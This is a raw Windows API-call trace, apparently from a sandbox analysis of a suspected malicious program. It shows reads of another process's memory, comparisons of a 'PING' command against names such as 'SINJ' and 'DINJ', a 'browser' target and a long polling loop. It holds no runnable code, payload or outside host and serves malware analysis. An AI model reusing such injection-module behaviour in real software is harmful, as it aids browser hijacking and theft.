	[0244.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225d20, cbMultiByte=-1, lpWideCharStr=0x22ffc30, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0244.921] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x26b8780, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26b8780, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0244.921] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x2251f8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2251f8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0244.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2251f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0244.921] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778d98
	[0244.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2251f8, cbMultiByte=-1, lpWideCharStr=0x2778d98, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0244.921] SetEvent (hEvent=0x474) returned 1
	[0244.922] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225d20) returned 1
	[0244.922] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0244.922] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2251f8) returned 1
	[0244.922] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778c30
	[0244.922] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0244.922] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0244.922] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0244.922] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0244.922] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0244.922] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff9a8
	[0244.922] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2778be0, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xe18) returned 0x6e0
	[0244.922] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778ca8
	[0244.922] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.922] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.922] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.922] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.922] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.922] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778ca8) returned 1
	[0244.922] Sleep (dwMilliseconds=0xbb8) 
	[0244.937] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.937] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.937] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.937] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.937] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.937] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.937] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778ca8) returned 1
	[0244.937] Sleep (dwMilliseconds=0xbb8) 
	[0244.952] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.952] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.952] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.952] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.952] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.952] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.952] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778ca8) returned 1
	[0244.952] Sleep (dwMilliseconds=0xbb8) 
	[0244.968] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.968] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.968] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.968] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.968] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.968] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.968] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777da8) returned 1
	[0244.968] Sleep (dwMilliseconds=0xbb8) 
	[0244.983] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.983] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.983] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.983] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.983] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0244.983] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0244.983] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778de8) returned 1
	[0244.984] Sleep (dwMilliseconds=0xbb8) 
	[0244.999] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0244.999] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0244.999] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0244.999] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0244.999] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.000] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.000] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778de8) returned 1
	[0245.000] Sleep (dwMilliseconds=0xbb8) 
	[0245.046] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.046] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.046] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.046] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.046] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.046] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.046] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778de8) returned 1
	[0245.046] Sleep (dwMilliseconds=0xbb8) 
	[0245.061] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.061] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.061] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.062] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.062] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.062] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.062] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778de8) returned 1
	[0245.062] Sleep (dwMilliseconds=0xbb8) 
	[0245.077] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.077] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.077] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.077] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.077] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.077] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.078] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778de8) returned 1
	[0245.078] Sleep (dwMilliseconds=0xbb8) 
	[0245.092] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.092] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.092] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.092] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.092] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.092] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.092] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778898) returned 1
	[0245.093] Sleep (dwMilliseconds=0xbb8) 
	[0245.108] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.108] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.108] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.108] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.108] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.108] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.108] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778898) returned 1
	[0245.108] Sleep (dwMilliseconds=0xbb8) 
	[0245.123] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.123] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.124] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.124] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.124] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.124] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.124] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778898) returned 1
	[0245.124] Sleep (dwMilliseconds=0xbb8) 
	[0245.139] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.139] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.139] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.139] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.139] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.139] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.139] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778190) returned 1
	[0245.139] Sleep (dwMilliseconds=0xbb8) 
	[0245.155] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.155] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.155] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.155] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.155] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.155] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.155] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778190) returned 1
	[0245.155] Sleep (dwMilliseconds=0xbb8) 
	[0245.180] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.180] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.180] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.180] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.180] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.180] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.180] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778190) returned 1
	[0245.180] Sleep (dwMilliseconds=0xbb8) 
	[0245.186] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.186] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.186] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.186] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.186] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.186] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.186] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778190) returned 1
	[0245.186] Sleep (dwMilliseconds=0xbb8) 
	[0245.201] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.201] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.201] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.201] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.202] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.202] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.202] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778190) returned 1
	[0245.202] Sleep (dwMilliseconds=0xbb8) 
	[0245.218] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.218] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.218] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.218] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.218] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.218] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.218] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778190) returned 1
	[0245.218] Sleep (dwMilliseconds=0xbb8) 
	[0245.233] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.233] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.233] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.233] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.233] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.233] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.233] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778190) returned 1
	[0245.233] Sleep (dwMilliseconds=0xbb8) 
	[0245.249] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.249] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.249] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.249] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.249] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.249] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.249] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778190) returned 1
	[0245.249] Sleep (dwMilliseconds=0xbb8) 
	[0245.264] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.264] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.264] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.264] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.264] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.264] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.264] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778190) returned 1
	[0245.264] Sleep (dwMilliseconds=0xbb8) 
	[0245.280] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.280] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.280] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.280] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.280] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.280] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.280] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778190) returned 1
	[0245.280] Sleep (dwMilliseconds=0xbb8) 
	[0245.296] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.296] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.296] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.296] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.296] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.296] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.296] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778190) returned 1
	[0245.296] Sleep (dwMilliseconds=0xbb8) 
	[0245.311] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.311] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.312] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.312] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.312] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.312] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.312] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778190) returned 1
	[0245.312] Sleep (dwMilliseconds=0xbb8) 
	[0245.327] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.327] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.327] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.327] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.327] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.327] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.327] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778190) returned 1
	[0245.327] Sleep (dwMilliseconds=0xbb8) 
	[0245.342] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.342] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.342] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.342] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.342] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.342] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.342] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778190) returned 1
	[0245.342] Sleep (dwMilliseconds=0xbb8) 
	[0245.358] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.358] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.358] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.358] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.358] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.358] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.358] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778190) returned 1
	[0245.358] Sleep (dwMilliseconds=0xbb8) 
	[0245.373] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.373] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.373] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.373] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.373] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.373] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.373] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778190) returned 1
	[0245.373] Sleep (dwMilliseconds=0xbb8) 
	[0245.389] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.389] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.389] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.389] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.389] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.389] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.389] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778190) returned 1
	[0245.389] Sleep (dwMilliseconds=0xbb8) 
	[0245.404] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.404] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.404] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.404] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.404] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.404] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.404] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778190) returned 1
	[0245.404] Sleep (dwMilliseconds=0xbb8) 
	[0245.420] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0245.420] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.420] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.420] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.420] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.420] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0245.420] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778190) returned 1
	[0245.420] Sleep (dwMilliseconds=0xbb8) 
	[0245.436] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0245.436] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225d20
	[0245.436] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x26b8780
	[0245.436] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2260d8
	[0245.436] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0245.436] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225d20, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225d20*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0245.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225d20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0245.436] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1810
	[0245.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225d20, cbMultiByte=-1, lpWideCharStr=0x27e1810, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0245.436] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x26b8780, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26b8780, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0245.436] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x2260d8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2260d8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0245.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2260d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0245.436] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778898
	[0245.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2260d8, cbMultiByte=-1, lpWideCharStr=0x2778898, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0245.436] SetEvent (hEvent=0x474) returned 1
	[0245.436] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225d20) returned 1
	[0245.436] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0245.436] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2260d8) returned 1
	[0245.436] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778de8
	[0245.436] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0245.436] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0245.436] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0245.437] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0245.437] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0245.437] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1828
	[0245.437] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2778190, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xe1c) returned 0x6ec
	[0245.437] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27786e0
	[0245.437] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0245.437] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0245.437] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0245.437] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0245.437] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
